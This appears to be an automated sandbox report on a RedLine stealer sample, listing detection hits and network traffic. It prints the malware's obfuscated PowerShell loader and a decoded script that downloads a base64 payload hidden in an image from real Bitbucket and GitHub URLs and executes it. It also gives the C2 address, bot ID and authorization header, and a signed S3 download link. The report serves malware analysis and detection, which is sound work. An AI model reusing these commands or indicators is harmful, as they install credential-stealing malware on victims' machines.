                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#Z
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , ProcessId: 7428, ProcessName: wscript.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , ProcessId: 7428, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , ProcessId: 7428, ProcessName: wscript.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sRMytgfRpJ.exe, ProcessId: 7328, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , ProcessId: 7428, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#Z

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell download and load assembly
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T12:16:25.187281+020020490381A Network Trojan was detected185.199.109.133443192.168.2.449730TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T12:16:34.112551+020020432341A Network Trojan was detected185.196.9.266302192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T12:16:33.921234+020020432311A Network Trojan was detected192.168.2.449739185.196.9.266302TCP
                  2024-09-26T12:16:39.174086+020020432311A Network Trojan was detected192.168.2.449739185.196.9.266302TCP
                  2024-09-26T12:16:41.485595+020020432311A Network Trojan was detected192.168.2.449739185.196.9.266302TCP
                  2024-09-26T12:16:41.769349+020020432311A Network Trojan was detected192.168.2.449739185.196.9.266302TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T12:16:41.155211+020020460561A Network Trojan was detected185.196.9.266302192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T12:16:33.921234+020020460451A Network Trojan was detected192.168.2.449739185.196.9.266302TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "185.196.9.26:6302", "Bot Id": "@dxrkl0rd", "Authorization Header": "9c8dd7353be7ed4b6832da21d8d0d902"}
                  Multi AV Scanner detection for submitted file
                  Source: sRMytgfRpJ.exeReversingLabs: Detection: 13%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7D6FD30EC
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.216.210.153:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: sRMytgfRpJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wextract.pdb source: sRMytgfRpJ.exe
                  Source: Binary string: wextract.pdbGCTL source: sRMytgfRpJ.exe
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7D6FD204C

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49739 -> 185.196.9.26:6302
                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49739 -> 185.196.9.26:6302
                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.196.9.26:6302 -> 192.168.2.4:49739
                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.196.9.26:6302 -> 192.168.2.4:49739
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.109.133:443 -> 192.168.2.4:49730
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 185.196.9.26:6302
                  Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.196.9.26:6302
                  Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /rulmerurk/ertertqw/downloads/wil25.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MDitjsvOKoKbCZYTOy3DolPfQ0bBGLHd6yaQTd5gEe7F1Z9x%2BV87sTjtC%2FYDH4I1wpK0l33W7F0Kch8ls%2FTbVXVMCh%2Fn1kFyEJlwfqO%2FsDQ%3D%3D&Expires=1727347382 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 185.196.9.26 185.196.9.26
                  Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                  Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                  Source: Joe Sandbox ViewASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
                  Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
                  Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
